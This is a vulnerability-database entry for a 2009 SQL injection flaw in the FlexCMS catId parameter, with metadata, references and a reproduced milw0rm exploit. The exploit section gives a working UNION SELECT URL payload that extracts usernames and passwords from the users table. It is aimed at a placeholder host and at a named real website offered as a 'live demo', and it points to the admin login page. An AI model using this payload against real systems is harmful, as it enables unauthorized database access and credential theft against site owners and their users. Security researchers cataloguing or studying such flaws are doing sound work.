FlexCMS catId Parameter SQL Injection Vulnerability

Vulnerability ID: 1117373
Vulnerability type: SQL injection
Published: 2009-02-09
Updated: 2009-02-12
CVE ID: CVE-2009-0534
CNNVD-ID: CNNVD-200902-281
Platform: PHP
CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/8018
https://cxsecurity.com/issue/WLB-2009020175
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-281
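|Vulnerability details
FlexCMS is a small, easy-to-use content management system (CMS). FlexCMS contains an SQL injection vulnerability. A remote attacker can execute arbitrary SQL commands via the catid parameter.
|Exploit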
AUTHOR: MisterRichard

FlexCMS Remote SQL Injection

Discovered by MisterRichard.

Developer site: http://www.flexcms.dk/

Developer has not been notified.

Live demo:

Injection: www.target.com/flx/webshop/?catId=145%20union%20all%20select%201,2,3,concat(username,char(58),password)+from+users--

http://www.radikalungdom.dk/flx/webshop/?catId=145%20union%20all%20select%201,2,3,concat(username,char(58),password)+from+users--

Admin login site:

http://target.com/flexadmin/

Greetz, agonx, kollek, cardingnu

# milw0rm.com [2009-02-09]
|References

Source: XF
Name: flexcms-catid-sql-injection(48609)
Link: http://xforce.iss.net/xforce/xfdb/48609
Source: BID
Name: 33696
Link: http://www.securityfocus.com/bid/33696
Source: MILW0RM
Name: 8018
Link: http://www.milw0rm.com/exploits/8018